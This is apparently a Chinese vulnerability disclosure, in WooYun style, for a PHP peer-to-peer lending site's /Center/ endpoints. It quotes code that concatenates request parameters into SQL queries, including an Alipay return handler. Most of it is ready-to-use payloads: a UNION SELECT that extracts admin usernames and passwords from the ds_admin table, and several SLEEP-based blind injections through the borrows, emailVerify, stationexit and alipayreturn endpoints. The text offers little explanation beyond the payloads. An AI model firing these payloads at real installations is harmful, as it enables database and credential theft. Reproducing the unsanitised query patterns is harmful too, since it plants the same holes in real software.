http://localhost/Center/invest/?mid=plan&bid=1) UNION SELECT 1,concat(username,0x2c,password),3,4,5,6,7,8 from ds_admin%23
这里还有一处sql盲注: public function borrows($id){ $borrowing = M("borrowing"); return $borrowing->where('id='.$id)->field('id,title,rates,deadline,money,state')->find(); } payload: http://localhost/Center/borrows/?id=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
再来一处sql盲注:
payload: http://localhost/Center/emailVerify/ post:email=test') AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23 再来一处sql盲注:
payload: http://localhost/Center/stationexit/test) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
最后两处sql注入: public function alipayreturn(){ $msgTools = A('msg','Event'); header("Content-Type:text/html; charset=utf-8"); vendor('Alipay.Notify'); $online=M('online'); $list=$online->where('`id`=1')->find(); $alipay_config['partner'] = $list['pid']; $alipay_config['key'] = $list['checking']; $alipay_config['sign_type'] = strtoupper('MD5');//签名方式 不需修改 $alipay_config['input_charset']= strtolower('utf-8');//字符编码格式 目前支持 gbk 或 utf-8 $alipay_config['transport'] = 'http';//访问模式,根据自己的服务器是否支持ssl访问,若支持请选择https;若不支持请选择http $alipayNotify = new AlipayNotify($alipay_config); $verify_result = $alipayNotify->verifyReturn(); //获取充值 $recharge=M('recharge'); $rechar=$recharge->where('nid='.$this->_get('out_trade_no'))->find(); if($verify_result) {//验证成功 //mark $recharge->where('nid='.$this->_get('out_trade_no'))->save(array('type'=>2,'audittime'=>time(),'date'=>json_encode($_GET),'handlers'=>'第三方支付')); //mark 这里应该是有两处sql盲注的,一处是select的,一处是update的 http://localhost/Center/alipayreturn/?out_trade_no=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--